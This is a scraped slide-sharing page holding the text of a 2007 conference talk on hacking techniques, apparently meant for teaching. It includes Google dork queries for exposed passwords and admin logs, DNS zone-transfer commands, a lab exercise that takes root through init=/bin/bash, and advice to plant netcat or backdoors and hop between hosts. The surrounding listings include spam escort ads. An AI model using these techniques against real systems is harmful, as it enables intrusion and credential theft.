Different types of attacks in internetRohan Bharadwaj
 
Command injection
Command injectionCommand injection
Command injectionpenetration Tester
 
WhatsApp Forensic
WhatsApp ForensicWhatsApp Forensic
WhatsApp ForensicAnimesh Shaw
 
Domain name system
Domain name systemDomain name system
Domain name systemDiwaker Pant
 
DDoS ATTACKS
DDoS ATTACKSDDoS ATTACKS
DDoS ATTACKSAnil Antony
 
Ethical Hacking Powerpoint
Ethical Hacking PowerpointEthical Hacking Powerpoint
Ethical Hacking PowerpointRen Tuazon
 
Spamming
SpammingSpamming
SpammingYash Shrivastava
 
Hacking presentation BASIC
Hacking presentation BASICHacking presentation BASIC
Hacking presentation BASICLakkireddy Bali Reddy Collage of Engineering
 
Intrusion detection and prevention system
Intrusion detection and prevention systemIntrusion detection and prevention system
Intrusion detection and prevention systemNikhil Raj
 
MALWARE
MALWAREMALWARE
MALWAREAnupam Das
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security VulnerabilitiesMarius Vorster
 
Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port ScanningSam Bowne
 
Destributed denial of service attack ppt
Destributed denial of service attack pptDestributed denial of service attack ppt
Destributed denial of service attack pptOECLIB Odisha Electronics Control Library
 
Waterhole Attack
Waterhole AttackWaterhole Attack
Waterhole AttackSymantec
 
Clickjacking Attack
Clickjacking AttackClickjacking Attack
Clickjacking AttackTùng Hà Sơn
 

More Related Content

What's hot

Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Gaurav Sharma
 
The CIA triad.pptx
The CIA triad.pptxThe CIA triad.pptx
The CIA triad.pptxGulnurAzat
 
DDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin BishtDDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin BishtNitin Bisht
 
Brute force attack
Brute force attackBrute force attack
Brute force attackjoycruiser
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attackAhmed Ghazey
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Umesh Mahawar
 
Different types of attacks in internet
Different types of attacks in internetDifferent types of attacks in internet
Different types of attacks in internetRohan Bharadwaj
 
Domain name system
Domain name systemDomain name system
Domain name systemDiwaker Pant
 
Ethical Hacking Powerpoint
Ethical Hacking PowerpointEthical Hacking Powerpoint
Ethical Hacking PowerpointRen Tuazon
 
Intrusion detection and prevention system
Intrusion detection and prevention systemIntrusion detection and prevention system
Intrusion detection and prevention systemNikhil Raj
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security VulnerabilitiesMarius Vorster
 
Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port ScanningSam Bowne
 

What's hot (20)

Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)
 
The CIA triad.pptx
The CIA triad.pptxThe CIA triad.pptx
The CIA triad.pptx
 
DDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin BishtDDoS Attack PPT by Nitin Bisht
DDoS Attack PPT by Nitin Bisht
 
Hacking ppt
Hacking pptHacking ppt
Hacking ppt
 
Brute force attack
Brute force attackBrute force attack
Brute force attack
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attack
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)
 
Different types of attacks in internet
Different types of attacks in internetDifferent types of attacks in internet
Different types of attacks in internet
 
Command injection
Command injectionCommand injection
Command injection
 
WhatsApp Forensic
WhatsApp ForensicWhatsApp Forensic
WhatsApp Forensic
 
Domain name system
Domain name systemDomain name system
Domain name system
 
DDoS ATTACKS
DDoS ATTACKSDDoS ATTACKS
DDoS ATTACKS
 
Ethical Hacking Powerpoint
Ethical Hacking PowerpointEthical Hacking Powerpoint
Ethical Hacking Powerpoint
 
Spamming
SpammingSpamming
Spamming
 
Hacking presentation BASIC
Hacking presentation BASICHacking presentation BASIC
Hacking presentation BASIC
 
Intrusion detection and prevention system
Intrusion detection and prevention systemIntrusion detection and prevention system
Intrusion detection and prevention system
 
MALWARE
MALWAREMALWARE
MALWARE
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security Vulnerabilities
 
Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port Scanning
 
Destributed denial of service attack ppt
Destributed denial of service attack pptDestributed denial of service attack ppt
Destributed denial of service attack ppt
 

Viewers also liked

Waterhole Attack
Waterhole AttackWaterhole Attack
Waterhole AttackSymantec
 
Day3 Backup
Day3 BackupDay3 Backup
Day3 BackupJai4uk
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Phishing attacks ppt
Phishing attacks pptPhishing attacks ppt
Phishing attacks pptAryan Ragu
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its typesSai Sakoji
 

Viewers also liked (7)

Waterhole Attack
Waterhole AttackWaterhole Attack
Waterhole Attack
 
Clickjacking Attack
Clickjacking AttackClickjacking Attack
Clickjacking Attack
 
Day3 Backup
Day3 BackupDay3 Backup
Day3 Backup
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
Hacking ppt
Hacking pptHacking ppt
Hacking ppt
 
Phishing attacks ppt
Phishing attacks pptPhishing attacks ppt
Phishing attacks ppt
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its types
 

Similar to Hacking techniques

2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?APNIC
 
Data Hiding Techniques
Data Hiding TechniquesData Hiding Techniques
Data Hiding Techniquesprashant3535
 
Drupal Camp Bristol 2017 - Website insecurity
Drupal Camp Bristol 2017 - Website insecurityDrupal Camp Bristol 2017 - Website insecurity
Drupal Camp Bristol 2017 - Website insecurityGeorge Boobyer
 
Hunt for the red DA
Hunt for the red DAHunt for the red DA
Hunt for the red DANeil Lines
 
Basic presentation of cryptography mechanisms
Basic presentation of cryptography mechanismsBasic presentation of cryptography mechanisms
Basic presentation of cryptography mechanismsMarian Marinov
 
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...RootedCON
 
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksSANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksMauricio Velazco
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - RoutersLogicaltrust pl
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersYury Chemerkin
 
Fundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalationnullthreat
 
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced ActorsMemory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced ActorsJared Greenhill
 
Pay attention to that man behind the curtain: Current state of Hacking Back
Pay attention to that man behind the curtain: Current state of Hacking BackPay attention to that man behind the curtain: Current state of Hacking Back
Pay attention to that man behind the curtain: Current state of Hacking Backx0rz x0rz
 
Hack Attack! An Introduction to Penetration Testing
Hack Attack! An Introduction to Penetration TestingHack Attack! An Introduction to Penetration Testing
Hack Attack! An Introduction to Penetration TestingSteve Phillips
 
BackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA PresentationBackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA PresentationJorge Orchilles
 
CEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptxCEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptxYasserOuda2
 
Observations from the APNIC Community Honeynet Project, presentation by Adli ...
Observations from the APNIC Community Honeynet Project, presentation by Adli ...Observations from the APNIC Community Honeynet Project, presentation by Adli ...
Observations from the APNIC Community Honeynet Project, presentation by Adli ...APNIC
 
History of some Vulnerabilities and exploit techniques
History of some Vulnerabilities and exploit techniquesHistory of some Vulnerabilities and exploit techniques
History of some Vulnerabilities and exploit techniquesblaufish
 
AEP Netwrorks Keyper HSM & ICANN DNSSEC
AEP Netwrorks Keyper HSM & ICANN DNSSECAEP Netwrorks Keyper HSM & ICANN DNSSEC
AEP Netwrorks Keyper HSM & ICANN DNSSECChin Wan Lim
 

Similar to Hacking techniques (20)

2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
2nd ICANN APAC-TWNIC Engagement Forum: What is Hitting my Honeypots?
 
Data Hiding Techniques
Data Hiding TechniquesData Hiding Techniques
Data Hiding Techniques
 
Drupal Camp Bristol 2017 - Website insecurity
Drupal Camp Bristol 2017 - Website insecurityDrupal Camp Bristol 2017 - Website insecurity
Drupal Camp Bristol 2017 - Website insecurity
 
Hunt for the red DA
Hunt for the red DAHunt for the red DA
Hunt for the red DA
 
Basic presentation of cryptography mechanisms
Basic presentation of cryptography mechanismsBasic presentation of cryptography mechanisms
Basic presentation of cryptography mechanisms
 
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
 
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksSANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routers
 
Fundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalation
 
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced ActorsMemory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
 
Pay attention to that man behind the curtain: Current state of Hacking Back
Pay attention to that man behind the curtain: Current state of Hacking BackPay attention to that man behind the curtain: Current state of Hacking Back
Pay attention to that man behind the curtain: Current state of Hacking Back
 
Dns firewalls null-may2020
Dns firewalls null-may2020Dns firewalls null-may2020
Dns firewalls null-may2020
 
Hack Attack! An Introduction to Penetration Testing
Hack Attack! An Introduction to Penetration TestingHack Attack! An Introduction to Penetration Testing
Hack Attack! An Introduction to Penetration Testing
 
BackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA PresentationBackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA Presentation
 
CEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptxCEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptx
 
Observations from the APNIC Community Honeynet Project, presentation by Adli ...
Observations from the APNIC Community Honeynet Project, presentation by Adli ...Observations from the APNIC Community Honeynet Project, presentation by Adli ...
Observations from the APNIC Community Honeynet Project, presentation by Adli ...
 
History of some Vulnerabilities and exploit techniques
History of some Vulnerabilities and exploit techniquesHistory of some Vulnerabilities and exploit techniques
History of some Vulnerabilities and exploit techniques
 
P05-slides
P05-slidesP05-slides
P05-slides
 
AEP Netwrorks Keyper HSM & ICANN DNSSEC
AEP Netwrorks Keyper HSM & ICANN DNSSECAEP Netwrorks Keyper HSM & ICANN DNSSEC
AEP Netwrorks Keyper HSM & ICANN DNSSEC
 

More from gaurav koriya

Intrusion detection system
Intrusion detection system Intrusion detection system
Intrusion detection system gaurav koriya
 
ALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSgaurav koriya
 
INDIA N heritage -THE PUNJAB
INDIA N heritage -THE PUNJABINDIA N heritage -THE PUNJAB
INDIA N heritage -THE PUNJABgaurav koriya
 
Katrin Aand Shruti Pps
Katrin Aand Shruti PpsKatrin Aand Shruti Pps
Katrin Aand Shruti Ppsgaurav koriya
 

More from gaurav koriya (8)

Intrusion detection system
Intrusion detection system Intrusion detection system
Intrusion detection system
 
pointers 1
pointers 1pointers 1
pointers 1
 
ALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMS
 
INDIA N heritage -THE PUNJAB
INDIA N heritage -THE PUNJABINDIA N heritage -THE PUNJAB
INDIA N heritage -THE PUNJAB
 
ip address
ip addressip address
ip address
 
About ip address
About ip addressAbout ip address
About ip address
 
Katrin Aand Shruti Pps
Katrin Aand Shruti PpsKatrin Aand Shruti Pps
Katrin Aand Shruti Pps
 
Mobile Computing
Mobile ComputingMobile Computing
Mobile Computing
 

Recently uploaded

Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentInMediaRes1
 
Accessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactAccessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactdawncurless
 
Science 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsScience 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsKarinaGenton
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformChameera Dedduwage
 
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17Celine George
 
MENTAL STATUS EXAMINATION format.docx
MENTAL STATUS EXAMINATION format.docxMENTAL STATUS EXAMINATION format.docx
MENTAL STATUS EXAMINATION format.docxPoojaSen20
 
How to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptxHow to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptxmanuelaromero2013
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxheathfieldcps1
 
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdfssuser54595a
 
How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17Celine George
 
Hybridoma Technology ( Production , Purification , and Application )
Hybridoma Technology ( Production , Purification , and Application ) Hybridoma Technology ( Production , Purification , and Application )
Hybridoma Technology ( Production , Purification , and Application ) Sakshi Ghasle
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptxContemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptxRoyAbrique
 
Employee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxEmployee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxNirmalaLoungPoorunde1
 
Introduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxIntroduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxpboyjonauth
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxiammrhaywood
 
Presiding Officer Training module 2024 lok sabha elections
Presiding Officer Training module 2024 lok sabha electionsPresiding Officer Training module 2024 lok sabha elections
Presiding Officer Training module 2024 lok sabha electionsanshu789521
 

Recently uploaded (20)

Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media Component
 
Accessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactAccessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impact
 
Science 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsScience 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its Characteristics
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy Reform
 
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
 
MENTAL STATUS EXAMINATION format.docx
MENTAL STATUS EXAMINATION format.docxMENTAL STATUS EXAMINATION format.docx
MENTAL STATUS EXAMINATION format.docx
 
How to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptxHow to Make a Pirate ship Primary Education.pptx
How to Make a Pirate ship Primary Education.pptx
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
 
How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17
 
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
 
Hybridoma Technology ( Production , Purification , and Application )
Hybridoma Technology ( Production , Purification , and Application ) Hybridoma Technology ( Production , Purification , and Application )
Hybridoma Technology ( Production , Purification , and Application )
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
 
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptxContemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
 
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdfTataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
 
Employee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxEmployee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptx
 
Introduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxIntroduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptx
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
 
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
 
Presiding Officer Training module 2024 lok sabha elections
Presiding Officer Training module 2024 lok sabha electionsPresiding Officer Training module 2024 lok sabha elections
Presiding Officer Training module 2024 lok sabha elections
 

Hacking techniques

  • 1. Hacking Techniques by Michael Hamm 01./02.02.2007 linuxdays.lu 2007 1
  • 2. Hacking Techniques 01./02.02.2007 linuxdays.lu 2007 2
  • 3. Hacking Techniques Attackers Objectives Hackers Challange, Status Spies Political Gain Terrorists Financial Gain Insider Damage Prof. Crimminaly Vandals 01./02.02.2007 linuxdays.lu 2007 3
  • 4. Hacking Techniques Geek Hackers Script Kiddies Stupid Users Automated Scripts / Viruses / Botnet / Spam 01./02.02.2007 linuxdays.lu 2007 4
  • 5. Hacking Techniques - High profile targets: -- Banks -- Military -- Universities -- Telecom / internet Provide --Private PC’s / Enduser -- Botnet -- Spam -- Homebanking Data 01./02.02.2007 linuxdays.lu 2007 5
  • 6. Hacking Techniques Most often Security problems: (Source: CSI/FBI Computer Crime and Security Survey) Vir Ins the De Un WL Ha ial ck au us ide ft L NA ing tho of r ap S ris top erv ed ice 01./02.02.2007 linuxdays.lu 2007 6
  • 7. Hacking Techniques ➤ Network based System Hacking ➤ Web Server Hacking ➤ Physically enter the Target Building ➤ WLAN (Wireless LAN) Hacking ➤ War Dialling ➤ Sniffing ➤ Social Engineering ➤ Viruses 01./02.02.2007 linuxdays.lu 2007 7
  • 8. Exercise: -- physical access = root rights -- 1. Interupt the bootloader by pressing >> e << 2. Select the kernel line and press >> e << 3. add >> init=/bin/bash << to the kernel line 4. kernel /vmlinuz-2.6.8 root=/dev/hda4 ro init=/bin/bash 5. Press >> Enter << 6. Press >> b << to boot 7. mount –o remount,rw /dev/hda4 8. passwd hamm ( password: test123) 9. passwd (password: test123) 10.sync 11.mount –o remount,ro /dev/hda4 12.shutdown –rn now 13. Login as user hamm & launch vmware; start all VM from top down 01./02.02.2007 linuxdays.lu 2007 8
  • 9. Hacking Techniques 5. Clearing Tracks 1. Reconnaissance 4. Maintaining Access 2. Scanning 3. Gaining Access 01./02.02.2007 linuxdays.lu 2007 9
  • 10. Footprinting -- Information Gathering -- ➤ visit targets’ websites ➤ review HTML Code, JavaScript and Comments & robots.txt ➤ search for passwords, hidden directories, contact names ➤ Dumpster Diving Quotation Bill Gates in: Susan Lammers; Programmers at Work Tempus Books; Reissue Edition, 1989 „No, the best way to prepare is to write programs, and to study great programs that other people have written. In my case, I went to the garbage cans at the Computer Science Centre and I fished out listings of their operating system.“ 01./02.02.2007 linuxdays.lu 2007 10
  • 11. Footprinting -- Information Gathering -- ➤ whois request at the Network Information Centre -- receive information about IP address ranges -- Names and EMail addresses of responsibles whois -h whois.dns.lu linuxdays.lu domainname: linuxdays.lu nserver: arthur.tudor.lu nserver: dorado.tudor.lu org-name: Centre de Recherche Public Henri Tudor adm-email: pierre.plumer@crpht.lu tec-name: Xavier Detro tec-email: xavier.detro@tudor.lu Important whois domains: - RIPE (Europe & N-Africa) - APNIC (Asia Pacific) - ARIN (N-America & S-Africa) - LACNIC (Latin America) 01./02.02.2007 linuxdays.lu 2007 11
  • 12. Footprinting -- Exercise Information Gathering -- ➤ DNS Lookup -- use nslookup tools to receive informations about DNS- & EMAIL Server, looking for names like Oracle, TestLinux, .... -- try a zone transfer ➤ Footprinting by DNS: nslookup(1); host(1); dig(1); # nslookup > server 192.168.22.22 > www.mumm.lu > set type=mx > mumm.lu > set type=any > mumm.lu > ls –d mumm.lu # try zone transfer > exit # dig @192.168.22.22 mumm.lu axfr # Zonetransfer 01./02.02.2007 linuxdays.lu 2007 12
  • 13. Footprinting -- Information Gathering -- ➤ whois tools: -- Sam Spade www.samspade.org -- Smart Whois www.tamos.com -- Netscan www.netscantools.com -- GTWhois www.geektools.com -- http://www.all-nettools.com/toolbox ➤ DNS must reads: -- RFC 1912 Common DNS Errors -- RFC 2182 Secondary DNS Servers -- RFC 2219 Use of DNS Aliases 01./02.02.2007 linuxdays.lu 2007 13
  • 14. Footprinting -- Information Gathering -- ➤ footprinting @ google ➤ news group articles of employees @<targetdomain> ➤ search business partners link:<targetdomain> ➤ site:<targetdomain> intitle:index.of ➤ site:<targetdomain> error | warning ➤ site:<targetdomain> login | logon ➤ site:<targetdomain> username | userid ➤ site:<targetdomain> password ➤ site:<targetdomain> admin | administrator ➤ site:<targetdomain> inurl:backup | inurl:bak ➤ site:<targetdomain> intranet 01./02.02.2007 linuxdays.lu 2007 14
  • 15. Google Hacking -- Introduction -- The Beginnings: www.theregister.co.uk/2001/11/28/the_google_attack_engine/ Link points to a Switch of a .gov Network Google not 'hackers' best friend‘ -- ww.vnunet.com/News/1127162 Index.of +banques +filetype:xls Johnny (I hack stuff) Long ‘Google Hacking for Penetration Testers’ Google Hacking Database http://johnny.ihackstuff.com 12.03.2006 Chicago Tribune http://www.heise.de/newsticker/meldung/70752 2600 CIA Agents discovered via Search Engine 01./02.02.2007 linuxdays.lu 2007 15
  • 16. Google Hacking -- Introduction -- What to know: Advanced Operands: site:<domainname> inurl:<path> filetype:<xls|doc|pdf|mdb|ppt|rtf|…….> intitle:<keyword> intext:<keyword> … … Google as an ‘Anonymous Proxy’ Google Cache &strip=1 01./02.02.2007 linuxdays.lu 2007 16
  • 17. Google Hacking -- Introduction -- What to know: The Power of combining Advanced Operands: site:heise.de –site:www.heise.de -- shows all websites NOT from the official Webserver -- maps nre hostnames without contacting target network -- wap.heise.de, chat.heise.de, www.tb.heise.de, … Offline Analysis of the search result: -- www.sensepost.com/research_misc.html -- SOAP Google API 01./02.02.2007 linuxdays.lu 2007 17
  • 18. Google Hacking -- Introduction -- What to find: The Google Hacking Database (johnny.ihackstuff.com): -- Directory Listings  Hidden/Private Files intitle:index.of ‘parent directory’ intitle:index.of.admin intitle:index.of inurl:admin intitle:index.of ws_ftp.log -- Error Messages of Scripts ‘Fatal error: call to undefined function’ –reply –the –next ‘Warning: Failed opening’ include_path -- Search for vulnerable Scripts inurl:guestbook/guestbooklist.asp ‘Post Date’ ‘From Country’ -- Search for Backups filetype:bak inurl:php.bak filetype:bak inurl:php.bak -- Search for: --- Printers; --- Webcams; --- Intranet Sites; --- Network Tools Ntop, MRTG; --- Databases 01./02.02.2007 linuxdays.lu 2007 18
  • 19. Google Hacking -- Exercise -- Livecycle of a Google Hack: 1. Security Problem deicovered on online product; 2. Analyse online product 3. Find typical string 4. Create a google request 5. Find vulnerable websites Examples: -- inurl:php.bak mysql_connect mysql_select_db -- ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-“ -- "index of/" "ws_ftp.ini" "parent directory“ -- !Host=*.* intext:enc_UserPassword=* ext:pcf -- "admin account info" filetype:log -- enable password | secret "current configuration“ -intext:the 01./02.02.2007 linuxdays.lu 2007 19
  • 20. Preparation anonymity doesn’t exist ➤ break systems in different countries / time zones ➤ install network multipurpose tools like netcat or backdoors ➤ hop from host to host to get anonymity 01./02.02.2007 linuxdays.lu 2007 20
  • 21. Hacking Techniques 5. Clearing Tracks 1. Reconnaissance 4. Maintaining Access 2. Scanning 3. Gaining Access 01./02.02.2007 linuxdays.lu 2007 21
